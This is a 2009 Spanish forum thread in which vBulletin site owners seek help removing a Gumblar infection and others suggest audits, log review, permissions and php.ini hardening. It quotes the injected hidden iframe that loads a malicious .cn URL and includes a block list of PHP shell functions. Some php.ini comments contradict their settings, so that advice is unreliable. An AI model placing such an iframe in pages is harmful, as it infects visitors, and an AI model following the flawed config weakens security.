Ayuda para eliminar virus en mi foro

sienteasturias · 4 May 2009

Hola gente tengo un problema desde hace unos dias y espero me puedan ayudar o alguna sugerencia sobre que puedo hacer ante esto, pues es a mucha gente que al ingresar al foro el antivirus les avisa de que hay algún codigo que se ha insertado en el foro en alguna parte....

este es el mensaje que sale en el antivirus kaspersky

Loading object http://gumblar.cn/rss/?id=,
containing trojan program trojam.JS.Agent.abf

a ver si me pueden ayudar para eliminar eso. gracias de antemano

pappocapo · 4 May 2009

Te inyectaron codigo en algun lado. Haz una auditoria de archivos y mira cada archivo que no lo reconozca como vbulletin o este modificado con respecto al default.

Esto es por algun bug de seguridad

sienteasturias · 4 May 2009

Como he de hacer eso de auditoria de archivos?(?)

pappocapo · 4 May 2009

En el panel de administracion>> Mantenimiento>> diagnostico>> Revisar Versión de Archivos >> Esta función listará cada uno de los archivos de tu vBulletin que esté etiquetado con una versión diferente a la que muestra tu foro

sienteasturias · 4 May 2009

Pues vereis en el index.php abajo de todo el codigo y tras la etiqueta de cierre ?> he localizado esto:

Insertar CODE, HTML o PHP:

<iframe src="http://yourlitetop.cn/ts/in.cgi?mozila9" width=2 height=4 style="visibility: hidden"></iframe>

lo he borrado y lo he vuelto a subir de nuevo, pero seguro que volvera a aparecer! tenemos alguna forma de hacer que no pueda ser escribible el fichero?

Gracias de nuevo!

pappocapo · 4 May 2009

Seguro estan vulnerando tu clave de ftp, esto debe ser porque es debil, porque estan ingresando a tu maquina o porque hay un problema de seguridad en el servidor. Pide un log al host para ver por donde entraron.

sienteasturias · 4 May 2009

La contraseña que tengo para el ftp es bastante larga y compleja, alternando tambien entre mayusculas y minusculas...

he visto que ese mismo iframe lo tenia insertado tambien en el index.html que esta dentro de la carpeta clientscript

Daniel B. · 4 May 2009

sienteasturias dijo:
Pues vereis en el index.php abajo de todo el codigo y tras la etiqueta de cierre ?> he localizado esto:

Insertar CODE, HTML o PHP:

<iframe src="http://yourlitetop.cn/ts/in.cgi?mozila9" width=2 height=4 style="visibility: hidden"></iframe>

lo he borrado y lo he vuelto a subir de nuevo, pero seguro que volvera a aparecer! tenemos alguna forma de hacer que no pueda ser escribible el fichero?

Gracias de nuevo!

Cambiale los permisos CHMOD y ve a este tema:
http://www.vbhispano.com/foros/f18/que_hackeo-9478/?highlight=hacer+ante+hackeo

Donde varios amigos opinan acerca de cómo actuar ante un hackeo,

sienteasturias · 14 May 2009

Bueno ya casi más o menos he limpiado el foro, mira que me ha dao trabajo... despues de ir leyendo por la red casos similares de este virus. Lo que si he visto es que no solo afecta a los index.php, o index.html como he leido en más de una ocasion en diferentes páginas, sino que llega a poder escribir el código en mas archivos e incluso en las carpetas images que tengas por la red se crea un archivo nuevo con el nombre images.php y en ese arvhivo esta inyectado el código nuevamente.

Ahora ya no me sale el aviso de que la pagina tiene codigo malicioso, pero tanto al pulsar sobre un tema del foro, asi como cuando se responde a un tema en la parte de abajo del navegador sigue mostrando: "conectando a gumblar...." y tarda un poquillo en visualizarse el tema o postear en el tema, he estado revisando uno por uno los archivos y ya no he encontrado más código en ningun sitio, pero eso sigue saliendo, alguna sugerencia donde se puede estar metido eso poco que me falta por limpiar?

Gracias!

Mega Bass · 14 May 2009

No te inditifica que archivo es, si te muestra el antiviruz, limpialo con el fpt.

pappocapo · 14 May 2009

Lo ponen en esos archivos porque son los que originan la pagina , no tendria sentido hacerlo en otros archivos. No te confies y vuelvo a decirte que pidas un log al host e identifiques por donde entraron. Eso se hace de forma manual. El atacante no le interesa tirar tu foro (lo podia haber hecho tranquilamente) solo le interesa usarte de mula para infectar a navegantes que ingresen a tu foro.

Por ultimo las claves seguras no necesariamente tienen que ser largas y el tema de la mayuscula o minuscula no es tan relevante. Es mucho mas efectivo que tengan caracteres como $?

Lo del antivirus en la mayoria de los casos no sirve para nada porque lo que hacen es ponerte un codigo que te lleva a otra pagina donde esta el troyano, no ponen el troyano directo en tu web. Es bastante comun esta practica por paginas porno rusas.

La mejor manera es pisar todos los archivos con una copia fresca, no se si sera necesario hacer un finalupgrade. La verdad que no se si es necesario este ultimo paso.

De lo que estpy seguro es que esto sucede por dos razones si tienes tu foro actualizado. O vulneran la clave o tienes mal los permisos de arfchivos y carpetas en el server. Si todo eso esta bien, me inclino a pensar de que es un tema de seguridad del server. Hace años cuando tenia otra web de otro estilo, tuve varios meses este problema y no se soluciono hasta que me cambie de servidor ya que a pesar de que era un buen server, no le hacian los parches de seguridad correspondientes.

sienteasturias · 15 May 2009

El foro lo tengo actualizado a la última versión actual, la 3.8.2. No se si los permisos estaban correctamente, por ejemplo los index.php estaban como 644, pero he tenido que ponerles a 444, de este modo es como ha paralizado la entrada a este virus puesto que no puede escribir en ellos. El tema de este virus por lo que he leido es bastante reciente pero hay mogollón de gente infectada por ello. Leia en bastantes web información , en muchos casos siempre leia siempre lo mismo, que afectaba a los index, con lo cual subia los archivos limpios y les ponia el chmod a 444, pero claro fue ayer a lo largo del día cuando llegue a una red y leia lo que también afectaba en las carpetas images y que se creaba un archivo images.php también donde se ponia el codigo, con lo cual antes de ayer que habia subido nuevamente todos los archivos del foro no sabia de estos archivos tambien, con lo cual ayer despues de leer lo de la carpeta de images comprobe y efectivamente ahi estaba el archivo, dentro del directorio del foro como en más partes de la web! Por cierto esto no iria aqui pero a raiz de que como os conte antes que habia resubi practicamente todo el foro, ahora en mi panel de control del admin me ha desaparecido la opcion del arcade, para los juegos que tengo en el foro y asi mismo el hack de easy_pages, he vuelto a subir los archivos de esos dos hacks pero no me salen en la administración, sim embargo si funcionan ambas cosas. a ver si me podeis decir que ha podido pasar!

RAugusto · 15 May 2009

Hace poco se metió este: Trojan.Brisv.A!inf
Mi antivirus no pudo eliminarlo y me recomendó que lo elimine manualmente (en Save Mode) ahora ya pudo bloquearlo.

pappocapo · 15 May 2009

A ver...

Si te vamos a decir lo que tienes que hacer y no lo haces, volviendo a poner un post pasando por alto lo que te decimos, no vamos a llegar a ningun lado satisfactorio. Pretendes que nosostros usemos "la videncia" para solucionar tu problema cuando lo que tienes que hacer es ver por donde entraron, la unica manera fiable de saberlo es ver el log de tu server, ahi quedo registrado todo. En base a ese dato, podremos enfocar un correcto soporte, sino son decenas de post sin llegar a nada.

Revisa el log de actividades (AHI ESTA LO QUE PASO)
Reemplaza con una copia nativa todo tu vb
cambia las claves usando caracteres $?
Coloca los permisos correctamente
Escanea tu ordenador por lo menos con tres antivirus online (kapersky, panda, esset) para ver si no levantan las claves de asi.
El ordenador que se usa para administrar el foro debe estar detras de un Firewall para evitar intrusiones.
Si alguna vez usaste algo null, realiza una auditoria a los archivos y elimina todo lo que este de mas

Si vuelve a pasar despues de todo eso, con seguridad es un problema de seguridad en tu servidor y si el soporte de tu host no te da una respuesta satisfactoria empieza a pensar en una migracion.

Estadisticamente el 80% de hosting mundial es de baja calidad, tienen buenos servers pero no le hacen el mantenimiento semanal adecuado, los ponen online y hasta que no explotan no se ocupan.

Con los datos que nos proporcionas no podemos hacer mas que esto por ti.

Hburzum · 15 May 2009

esto paso con mi servidor , uso joomla y vbulletin
tube que reiniciar todo , formatiar el servidor con la empresa afiliada ya que tenia muchos bug
revisa todos los index.html , y los php

cri · 16 May 2009

Hola! que tal?
Soy nueva en esto y la verda que estoy un poco desesperada y agradeceria bastante vuestra ayuda.
He tenido la mala suerte de que este virus gumblar entre en mi pagina web.He seguido las indicaciones que he leido en internet para solucionarlo; he limpiado todas las paginas, y lo unico que no he podido hacer es cambiar la contraseña de ftp, porque eso no esta en mis manos. Tras limpiarlo varias veces vuleve a aparecer. Pero lo peor de todo es que ya no puedo conectarme al sitio ftp, me sale que la contraseña y el usuario no son correctos. No se si tiene algo que ver con el virus o puede ser otro problema.
Weno, espero que alguien conteste pronto.
Un saludo, y gracias de antemano

Daniel B. · 16 May 2009

pappocapo dijo:
Estadisticamente el 80% de hosting mundial es de baja calidad, tienen buenos servers pero no le hacen el mantenimiento semanal adecuado, los ponen online y hasta que no explotan no se ocupan.

Con los datos que nos proporcionas no podemos hacer mas que esto por ti.

Humm, muestrame esas estadísticas, yo soy proveedor de hosting y si es así, pertenezco al 20% restante, ya que mis servidores tienen un Uptime de 100%, 70 días Online (73 Days 20:59:20) (sin ningún tipo de caída o error 500), un SL de 0.45/0.95, y los tengo muy asegurados y parcheados, uso CentOS y Redhat.
-------------
Volviendo al tema, tu usas una cuenta compartida, ¿verdad?, si es así, entonces el problema ya no creo que sea de tus ficheros, si es que mencionas que ya les haz hecho de todo, te sugiero que abras contacto con tus proveedores.

Probablemente unas personas hackearon el servidor, consiguiendo el root montando una shell por alguna de las cuentas del servidor, encontraron algún bug en el kernel y accedieron como super-administradores y ahí está el exploit, de pronto incluso soy muy dramático, de pronto fue una pequeña intrusión nada más. Haz respaldo de tus ficheros, ¿Ya lo has hecho verdad?-

O simplemente alguien entró al servidor con algún tipo de permisos, y él, estaba infectado :/.

Crea una copia fresca de vBulletin,
Existe una posible solución, que es una modificación a php.ini,

Insertar CODE, HTML o PHP:

register_globals = 0
;Esto previene que se definan valores mediante la url.register_globals off
allow_url_fopen = 0
;no se
safe_mode = 0
;Habilita el modo seguro, con esto bloqueamos la mayoria de las caracteristicas de las “shell”
magic_quotes_gpc = 1
; Poniendola OFF, reemplaza las comillas simples y dobles del POST/GET/Cookie por barras (Slash)
file_uploads = 0
; Evita que se suban archivos desde PHP
disable_functions = show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open, proc_clse, dl
;Desactiva las funciones mas comunes que utilizan las shell PHP.
;Lo de abajo es experimental, para probar:
;memory_limit = 2M
;Con esto prevenimos que los script consuman mucha memoria que no necesita
;sql.safe_mode = 1
; Activa el modo seguro de SQL
;magic_quotes_runtime = 1
;Si magic_quotes_runtime está habilitado, la mayoría de funciones que devuelven datos de alguna clase de fuente externa, incluyendo bases de datos y archivos de texto, tendrán las comillas escapadas con barras invertidas

cri · 17 May 2009

Me gustaria saber si habria alguna manera de solucionar mi problema, sin hablar con el administrador.
Entonces, han hackeado el servidor?
Ahora mismo, mi pagina web va bien, no hay rastros de codigo malicioso.
Tambien os quiero indicar que mi pagina web, no tiene nada de bases de datos, simplemente es codigo .html
Alguna contestacion?
Gracias